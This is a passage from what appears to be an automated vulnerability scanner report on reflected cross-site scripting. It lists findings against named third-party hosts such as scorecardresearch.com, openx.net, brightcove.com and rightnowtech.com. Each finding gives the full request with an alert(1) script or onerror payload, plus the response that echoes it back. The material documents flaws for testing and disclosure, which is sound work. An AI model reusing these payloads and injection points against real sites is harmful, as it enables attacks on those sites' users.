Expires: Wed, 12 Oct 2011 02:52:56 GMT
Date: Wed, 28 Sep 2011 02:52:56 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693128f0<script>alert(1)</script>073f8a07027", c3:"1", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.193. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload b0e7f<script>alert(1)</script>7e360bc2df2 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1b0e7f<script>alert(1)</script>7e360bc2df2&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:57 GMT
Date: Wed, 28 Sep 2011 02:52:57 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1b0e7f<script>alert(1)</script>7e360bc2df2", c4:"http://macnn.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.194. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d6c0e<script>alert(1)</script>c374874210e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2Fd6c0e<script>alert(1)</script>c374874210e&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:58 GMT
Date: Wed, 28 Sep 2011 02:52:58 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/d6c0e<script>alert(1)</script>c374874210e", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.195. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8eada<script>alert(1)</script>53915b59fa0 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=8eada<script>alert(1)</script>53915b59fa0&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:52:59 GMT
Date: Wed, 28 Sep 2011 02:52:59 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"8eada<script>alert(1)</script>53915b59fa0", c6:"", c10:"", c15:"", c16:"", r:""});



1.196. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 513c2<script>alert(1)</script>63f76fd61fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmacnn.com%2F&c5=&c6=513c2<script>alert(1)</script>63f76fd61fa&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 12 Oct 2011 02:53:00 GMT
Date: Wed, 28 Sep 2011 02:53:00 GMT
Content-Length: 1252
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://macnn.com/", c5:"", c6:"513c2<script>alert(1)</script>63f76fd61fa", c10:"", c15:"", c16:"", r:""});



1.197. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcvipca02.rightnowtech.com
Path:   /Chat/chat/rightnow

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc was submitted in the REST URL parameter 3. This input was echoed as b3f1a<img src=a onerror=alert(1)>a456b84bccc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Chat/chat/rightnowb3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 472
Server: Jetty(6.1.25)

rntJSONpac_1({"error":{"chatSystemError":{"text":"Unknown or misconfigured site specified in '/rightnowb3f1a<img src=a onerror=alert(1)>a456b84bccc' AT Wed Aug 31 11:18:05 PDT 2011","chatMessageType":"ChatSystemError","type":{"value":"CANCEL","chatMessageType":"ChatErrorType"},"errorCondition":{"value":"SERVICE_UNAVAILABLE","chatMessageType":"Cha
...[SNIP]...

1.198. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcvipca02.rightnowtech.com
Path:   /Chat/chat/rightnow

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload da0b6<script>alert(1)</script>d4681e8f055 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Chat/chat/rightnow?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 121
Server: Jetty(6.1.25)

rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055({"queueId":61,"availableAgentSessions":8,"expectedWaitSeconds":0});

1.199. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callbackArgument parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcvipca02.rightnowtech.com
Path:   /Chat/chat/rightnow

Issue detail

The value of the callbackArgument request parameter is copied into the HTML document as plain text between tags. The payload ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19 was submitted in the callbackArgument parameter. This input was echoed as ae9d7<img src=a onerror=alert(1)>ceff7420d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Chat/chat/rightnow;jsessionid=1a724kt3h9vx819uympgg8zeuo?pool=3571:5&site_name=rightnow&responseType=JSON&callback=RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess&callbackArgument=0ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19&action=SEND_TEXT&msg=Hi-&offTheRecord=false HTTP/1.1
Host: bcvipca02.rightnowtech.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://crm.rightnow.com/app/chat/bdr_chat_landing/first_name/Hoyt%20LLC/last_name/Research/email/rtfm%40fastdial.net
Cookie: JSESSIONID=1a724kt3h9vx819uympgg8zeuo; BIGipServer=83893258.35125.0000

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 628
Server: Jetty(6.1.25)

RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess({"data":["0ae9d7<img src=a onerror=alert(1)>ceff7420d19"],"chatMessageType":"ChatMessage","responses":[{"sessionId":"1a724kt3h9vx819uympgg8zeuo","chatSystemError":{"text":"JSESSIONID not specified or invalid","chatMessageType":"ChatSystemError","type":{"va
...[SNIP]...

1.200. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ea276<script>alert(1)</script>2c8c12f6b22 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_52405312703ea276<script>alert(1)</script>2c8c12f6b22&pid=08d931ef-b202-210f-afa6-864a92315113&s=728x90&f=4.00&cid=Allmenus&url=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn2.allmenus.com.s3.amazonaws.com/v50/common/static/advertisements.html?server=www.allmenus.com&slot=am_50_header_leaderboard&ignore=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d8661604-aefb-4946-9a31-42430906ad5a; s=1492b9da-5863-4500-b6dd-490569492c7f; p=1313102815

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1313102976; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_52405312703ea276<script>alert(1)</script>2c8c12f6b22({"r":null});

1.201. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://brocade.netshelter.net
Path:   /fixed_placement.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f4f"%3balert(1)//73dd2287075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16f4f";alert(1)//73dd2287075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fixed_placement.js.php?publisher=info/16f4f"%3balert(1)//73dd2287075rmit HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Aug 2011 17:54:51 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.4
Content-Length: 42174
Connection: keep-alive

var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);

//Include NAP
window.blockNSPageTrack = true;
/* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with
* Array.prot
...[SNIP]...
orting as this
var NS_37_1_adSize="1x1";
// site name - any string - %s is the DART site variable - will be displayed in reporting as this
//var NS_37_1_adSite="%s";
var NS_37_1_adSite = "ns." + "info/16f4f";alert(1)//73dd2287075rmit";
// click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART
var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://a
...[SNIP]...

1.202. http://brocade.netshelter.net/fixed_placement.js.php [publisher parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://brocade.netshelter.net
Path:   /fixed_placement.js.php

Issue detail

The value of the publisher request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a983"%3balert(1)//1a28d2ffdbe was submitted in the publisher parameter. This input was echoed as 5a983";alert(1)//1a28d2ffdbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fixed_placement.js.php?publisher=informit5a983"%3balert(1)//1a28d2ffdbe HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Aug 2011 17:54:48 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.4
Content-Length: 42172
Connection: keep-alive

var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);

//Include NAP
window.blockNSPageTrack = true;
/* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with
* Array.prot
...[SNIP]...
ing as this
var NS_37_1_adSize="1x1";
// site name - any string - %s is the DART site variable - will be displayed in reporting as this
//var NS_37_1_adSite="%s";
var NS_37_1_adSite = "ns." + "informit5a983";alert(1)//1a28d2ffdbe";
// click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART
var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://adv.n
...[SNIP]...

1.203. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 1af17<script>alert(1)</script>33d62cd3122 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAGVItvU~,xxq25SD_mE9Rd7N-RZcmqKic844kbT39 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=640&height=360&flashID=myExperience760506419001&bgcolor=%23FFFFFF&playerID=756466704001&playerKey=AQ~~%2CAAAAAGVItvU~%2Cxxq25SD_mE9Rd7N-RZcmqKic844kbT39&isVid=true&isUI=true&dynamicStreaming=true&wmode=transparent&%40videoPlayer=760506419001&autoStart=&debuggerID=
Content-Length: 533
Origin: http://www.activenetwork.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qc637636194158e54e9df26b405d6e8a768c8cdf7
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Wed, 31 Aug 2011 17:57:57 GMT
Server:
Content-Length: 3496

......../1/onResult......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A.R-.@...eAQ~~,AAAAAGVItvU~,xxq25SD_mE9Rd7N-RZcmqKic844kbT39.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bf"6.. ..ivideoPlayer1af17<script>alert(1)</script>33d62cd3122..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

1.204. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd was submitted in the REST URL parameter 14. This input was echoed as c89cc<img src=a onerror=alert(1)>a91674af5dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134c89cc<img%20src%3da%20onerror%3dalert(1)>a91674af5dd/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 31 Aug 2011 21:50:36 GMT
Expires: Sat, 03 Sep 2011 21:49:36 GMT
ObjectVersions: [Inst: req 2, db 2]; [Reg: req 21, db 21];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 5404

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23FFFFFF&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fserv
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/63b0a2eb-de86-438e-a586-0b38939f7284.png?21"}],"token":"b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134c89cc<img src=a onerror=alert(1)>a91674af5dd"});

1.205. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6044<a>0e177e272a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30d6044<a>0e177e272a8/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Wed, 31 Aug 2011 21:50:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web01
Content-Length: 1190

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30d6044<a>0e177e272a8","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

1.206. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 97343<script>alert(1)</script>30c35374104 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26G47UIDG3DDCBB22A7G2DC864G2D41F5G2D960CG2D8BCAF2F5EEA0G26fbidG3DFQXQSI1dYd5G26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=197343<script>alert(1)</script>30c35374104&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&GUID=DCBB22A7-C864-41F5-960C-8BCAF2F5EEA0&fbid=FQXQSI1dYd5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
